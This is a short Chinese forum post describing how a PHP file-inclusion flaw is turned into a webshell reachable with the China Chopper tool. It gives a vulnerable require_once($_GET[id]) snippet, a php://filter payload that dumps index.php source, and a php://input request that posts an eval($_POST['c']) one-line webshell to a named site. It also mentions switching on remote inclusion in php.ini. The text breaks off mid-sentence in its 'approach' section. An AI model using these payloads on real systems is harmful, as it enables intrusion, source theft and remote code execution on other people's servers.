起因

星哥突然丢了一个站,说是有本地包含。但是没有办法上传,说不知道怎么办?突然他很得瑟地说,给你们看一个神奇东西。

我觉得好像不是特别奇怪,因为ctf里面总是出这种包含然后读取源码的题目。

<?php require_once("$_GET[id]"); ?>

读取源码
xx.php?id=php://filter/read=convert.base64-encode/resource=index.php
所以理所当然地认为php://input也是可以的。
然后测试了下,发现那个站的确可以这样。

当时一直认为本地包含也可以这样用,后来也证实了我的无知。在本地搭建一次次失败之后,突然窑子和我说这个要开启远程包含,然后修改php.ini

把默认的Off改成On,就可以这样用了。

将错就错

其实我刚开始一直以为本地包含也可以这样做,然后我就想了,可不可以把它搞到菜刀上,菜刀来连接。当时也就这么几个想法,第一:对菜刀进行抓包,抓到菜刀上传文件的数据包,然后替换。第二:利用php system之类的函数执行一些下载之类的命令。第三:把这个包含变成一句话,直接菜刀连接。(ps:当时觉得如果真的是这样做,包含直接转换成webshell感觉还不错)。

思路

http://www.codersec.net/index.php?page=php://input
post数据 <?php eval($_POST['c']);?>&c=phpinfo();

说白了就是我们怎么想办法把原来的让

http://www.codersec.net/index.php?page=php://input
点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖